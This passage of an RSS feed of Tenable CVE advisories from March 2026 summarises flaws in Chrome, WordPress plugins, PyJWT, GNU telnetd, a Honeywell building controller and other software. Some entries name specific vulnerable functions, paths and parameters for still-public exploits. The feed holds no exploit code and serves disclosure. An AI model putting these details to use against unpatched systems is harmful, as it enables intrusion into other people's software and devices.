      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3923">https://www.tenable.com/cve/CVE-2026-3923</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3922]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3922</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3922</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in MediaStream in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3922">https://www.tenable.com/cve/CVE-2026-3922</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3921]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3921</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3921</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in TextEncoding in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3921">https://www.tenable.com/cve/CVE-2026-3921</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3920]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3920</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3920</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out of bounds memory access in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3920">https://www.tenable.com/cve/CVE-2026-3920</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3919]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3919</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3919</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Extensions in Google Chrome prior to 146.0.7680.71 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3919">https://www.tenable.com/cve/CVE-2026-3919</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3918]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3918</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3918</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in WebMCP in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3918">https://www.tenable.com/cve/CVE-2026-3918</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3917]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3917</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3917</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Agents in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3917">https://www.tenable.com/cve/CVE-2026-3917</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3916]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3916</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3916</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Out of bounds read in Web Speech in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3916">https://www.tenable.com/cve/CVE-2026-3916</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3915]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3915</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3915</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap buffer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3915">https://www.tenable.com/cve/CVE-2026-3915</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3914]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3914</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3914</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Integer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3914">https://www.tenable.com/cve/CVE-2026-3914</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3913]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3913</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3913</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap buffer overflow in WebML in Google Chrome prior to 146.0.7680.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3913">https://www.tenable.com/cve/CVE-2026-3913</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3910]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3910</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3910</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:11 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Inappropriate implementation in V8 in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3910">https://www.tenable.com/cve/CVE-2026-3910</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3909]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3909</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3909</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:11 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out of bounds write in Skia in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3909">https://www.tenable.com/cve/CVE-2026-3909</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3891]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3891</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3891</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:10 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may make remote code execution possible.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3891">https://www.tenable.com/cve/CVE-2026-3891</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3873]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3873</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3873</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:10 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use of Hard-coded Credentials vulnerability in Avantra allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Avantra: before 25.3.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3873">https://www.tenable.com/cve/CVE-2026-3873</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3798]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3798</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3798</guid>
            <pubDate>Mon, 09 Mar 2026 04:16:02 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A vulnerability was detected in Comfast CF-AC100 2.6.0.8. This affects the function sub_44AC14 of the file /cgi-bin/mbox-config?method=SET&section=ping_config of the component Request Path Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3798">https://www.tenable.com/cve/CVE-2026-3798</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3725]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3725</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3725</guid>
            <pubDate>Sun, 08 Mar 2026 09:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A flaw has been found in 1024-lab/lab1024 SmartAdmin up to 3.29. Affected by this issue is the function freemarkerResolverContent of the file sa-base/src/main/java/net/lab1024/sa/base/module/support/mail/MailService.java of the component FreeMarker Template Handler. Executing a manipulation of the argument template_content can lead to improper neutralization of special elements used in a template engine. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3725">https://www.tenable.com/cve/CVE-2026-3725</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3721]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3721</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3721</guid>
            <pubDate>Sun, 08 Mar 2026 08:16:00 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A weakness has been identified in 1024-lab/lab1024 SmartAdmin up to 3.29. The affected element is an unknown function of the file sa-base/src/main/java/net/lab1024/sa/base/module/support/helpdoc/domain/form/HelpDocAddForm.java of the component Help Documentation Module. This manipulation causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3721">https://www.tenable.com/cve/CVE-2026-3721</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3720]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3720</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3720</guid>
            <pubDate>Sun, 08 Mar 2026 08:15:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A security flaw has been discovered in 1024-lab/lab1024 SmartAdmin up to 3.29. Impacted is an unknown function of the file smart-admin-web-javascript/src/views/business/oa/notice/components/notice-form-drawer.vue of the component Notice Module. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3720">https://www.tenable.com/cve/CVE-2026-3720</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3611]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3611</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3611</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:27 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>The Honeywell IQ4x building management controller exposes its full web-based HMI without authentication in its factory-default configuration. With no user module configured, security is disabled by design and the system operates under a System Guest (level 100) context, granting read/write privileges to any party able to reach the HTTP interface. Authentication controls are only enforced after a web user is created via U.htm, which dynamically enables the user module. Because this function is accessible prior to authentication, a remote user can create a new account with administrative read/write permissions, enabling the user module and imposing authentication under attacker-controlled credentials. This action can effectively lock legitimate operators out of local and web-based configuration and administration.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3611">https://www.tenable.com/cve/CVE-2026-3611</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3455]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3455</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3455</guid>
            <pubDate>Tue, 03 Mar 2026 05:17:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Versions of the package mailparser before 3.9.3 are vulnerable to Cross-site Scripting (XSS) via the textToHtml() function due to the improper sanitisation of URLs in the email content. An attacker can execute arbitrary scripts in victim browsers by adding extra quote " to the URL with embedded malicious JavaScript code.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3455">https://www.tenable.com/cve/CVE-2026-3455</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3393]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3393</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3393</guid>
            <pubDate>Sun, 01 Mar 2026 13:16:14 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A security vulnerability has been detected in jarikomppa soloud up to 20200207. The impacted element is the function SoLoud::Wav::loadflac of the file src/audiosource/wav/soloud_wav.cpp of the component Audio File Handler. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3393">https://www.tenable.com/cve/CVE-2026-3393</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32746]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32746</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32746</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:10 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>telnetd in GNU inetutils through 2.7 allows an out-of-bounds write in the LINEMODE SLC (Set Local Characters) suboption handler because add_slc does not check whether the buffer is full.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32746">https://www.tenable.com/cve/CVE-2026-32746</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32745]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32745</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32745</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In JetBrains Datalore before 2026.1 session hijacking was possible due to missing secure attribute for cookie settings.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32745">https://www.tenable.com/cve/CVE-2026-32745</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32612]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32612</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32612</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Statamic is a Laravel and Git powered content management system (CMS). Prior to 6.6.2, stored XSS in the control panel color mode preference allows authenticated users with control panel access to inject malicious JavaScript that executes when a higher-privileged user impersonates their account. This has been fixed in 6.6.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32612">https://www.tenable.com/cve/CVE-2026-32612</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32598]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32598</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32598</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OneUptime is a solution for monitoring and managing online services. Prior to 10.0.24, the password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user. This vulnerability is fixed in 10.0.24.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32598">https://www.tenable.com/cve/CVE-2026-32598</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32597]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32597</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32597</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32597">https://www.tenable.com/cve/CVE-2026-32597</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32543]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32543</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32543</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in CyberChimps Responsive Blocks responsive-block-editor-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Responsive Blocks: from n/a through <= 2.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32543">https://www.tenable.com/cve/CVE-2026-32543</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32487]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32487</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32487</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Lawyer Landing Page lawyer-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lawyer Landing Page: from n/a through <= 1.2.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32487">https://www.tenable.com/cve/CVE-2026-32487</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32486]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32486</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32486</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in wptravelengine Travel Booking travel-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Travel Booking: from n/a through <= 1.3.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32486">https://www.tenable.com/cve/CVE-2026-32486</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32462]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32462</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32462</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows DOM-Based XSS. This issue affects Master Addons for Elementor: from n/a through <= 2.1.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32462">https://www.tenable.com/cve/CVE-2026-32462</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32461]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32461</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32461</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Really Simple Plugins Really Simple SSL really-simple-ssl allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Really Simple SSL: from n/a through <= 9.5.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32461">https://www.tenable.com/cve/CVE-2026-32461</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32460]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32460</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32460</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Ultimate Addons for Contact Form 7 ultimate-addons-for-contact-form-7 allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ultimate Addons for Contact Form 7: from n/a through <= 3.5.36.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32460">https://www.tenable.com/cve/CVE-2026-32460</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32459]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32459</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32459</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in flycart UpsellWP checkout-upsell-and-order-bumps allows Blind SQL Injection. This issue affects UpsellWP: from n/a through <= 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32459">https://www.tenable.com/cve/CVE-2026-32459</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32458]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32458</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32458</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:08 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 WOLF bulk-editor allows Blind SQL Injection. This issue affects WOLF: from n/a through <= 1.0.8.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32458">https://www.tenable.com/cve/CVE-2026-32458</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32457]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32457</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32457</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:07 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Wombat Plugins Advanced Product Fields (Product Addons) for WooCommerce advanced-product-fields-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Advanced Product Fields (Product Addons) for WooCommerce: from n/a through <= 1.6.18.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32457">https://www.tenable.com/cve/CVE-2026-32457</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32456]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32456</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32456</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:07 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in Janis Elsts Admin Menu Editor admin-menu-editor allows Cross Site Request Forgery. This issue affects Admin Menu Editor: from n/a through <= 1.14.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32456">https://www.tenable.com/cve/CVE-2026-32456</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32455]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32455</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32455</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:07 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 MDTF wp-meta-data-filter-and-taxonomy-filter allows DOM-Based XSS. This issue affects MDTF: from n/a through <= 1.3.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32455">https://www.tenable.com/cve/CVE-2026-32455</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32454]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32454</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32454</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:07 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeFusion Avada Core fusion-core allows DOM-Based XSS. This issue affects Avada Core: from n/a through < 5.15.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32454">https://www.tenable.com/cve/CVE-2026-32454</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32453]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32453</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32453</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:06 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in ThemeFusion Avada Core fusion-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Avada Core: from n/a through < 5.15.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32453">https://www.tenable.com/cve/CVE-2026-32453</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32452]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32452</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32452</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:06 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fusion Builder: from n/a through < 3.15.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32452">https://www.tenable.com/cve/CVE-2026-32452</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32451]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32451</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32451</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:06 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fusion Builder: from n/a through < 3.15.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32451">https://www.tenable.com/cve/CVE-2026-32451</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32450]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32450</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32450</guid>
            <pubDate>Fri, 13 Mar 2026 19:55:06 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows DOM-Based XSS. This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32450">https://www.tenable.com/cve/CVE-2026-32450</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32449]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32449</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32449</guid>
